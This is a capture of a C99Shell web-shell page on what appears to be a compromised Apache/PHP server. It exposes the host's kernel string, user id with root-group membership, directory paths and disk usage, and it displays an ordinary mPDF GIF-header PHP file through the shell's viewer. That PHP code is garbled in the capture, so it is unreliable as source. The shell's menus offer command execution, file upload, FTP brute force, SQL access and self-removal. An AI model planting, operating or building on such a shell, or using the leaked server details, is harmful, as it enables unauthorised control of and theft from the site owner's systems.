!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/vendor/mpdf/mpdf/src/Gif/   drwxr-xr-x
Free 25.32 GB of 117.98 GB (21.46%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ImageHeader.php (1.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Mpdf\Gif;

/**
 * GIF Util - (C) 2003 Yamasoft (S/C)
 *
 * All Rights Reserved
 *
 * This file can be freely copied, distributed, modified, updated by anyone under the only
 * condition to leave the original address (Yamasoft, http://www.yamasoft.com) and this header.
 *
 * @link http://www.yamasoft.com
 */
class ImageHeader
{

    var 
$m_nLeft;

    var 
$m_nTop;

    var 
$m_nWidth;

    var 
$m_nHeight;

    var 
$m_bLocalClr;

    var 
$m_bInterlace;

    var 
$m_bSorted;

    var 
$m_nTableSize;

    
/**
     * @var \Mpdf\Gif\ColorTable
     */
    
var $m_colorTable;

    public function 
__construct()
    {
        unset(
$this->m_nLeft);
        unset(
$this->m_nTop);
        unset(
$this->m_nWidth);
        unset(
$this->m_nHeight);
        unset(
$this->m_bLocalClr);
        unset(
$this->m_bInterlace);
        unset(
$this->m_bSorted);
        unset(
$this->m_nTableSize);
        unset(
$this->m_colorTable);
    }

    function 
load($lpData, &$hdrLen)
    {
        
$hdrLen 0;

        
$this->m_nLeft $this->w2i(substr($lpData02));
        
$this->m_nTop $this->w2i(substr($lpData22));
        
$this->m_nWidth $this->w2i(substr($lpData42));
        
$this->m_nHeight $this->w2i(substr($lpData62));

        if (!
$this->m_nWidth || !$this->m_nHeight) {
            return 
false;
        }

        
$b ord($lpData[8]);
        
$this->m_bLocalClr = ($b 0x80) ? true false;
        
$this->m_bInterlace = ($b 0x40) ? true false;
        
$this->m_bSorted = ($b 0x20) ? true false;
        
$this->m_nTableSize << ($b 0x07);
        
$hdrLen 9;

        if (
$this->m_bLocalClr) {
            
$this->m_colorTable = new ColorTable();
            if (!
$this->m_colorTable->load(substr($lpData$hdrLen), $this->m_nTableSize)) {
                return 
false;
            }
            
$hdrLen += $this->m_nTableSize;
        }

        return 
true;
    }

    function 
w2i($str)
    {
        return 
ord(substr($str01)) + (ord(substr($str11)) << 8);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--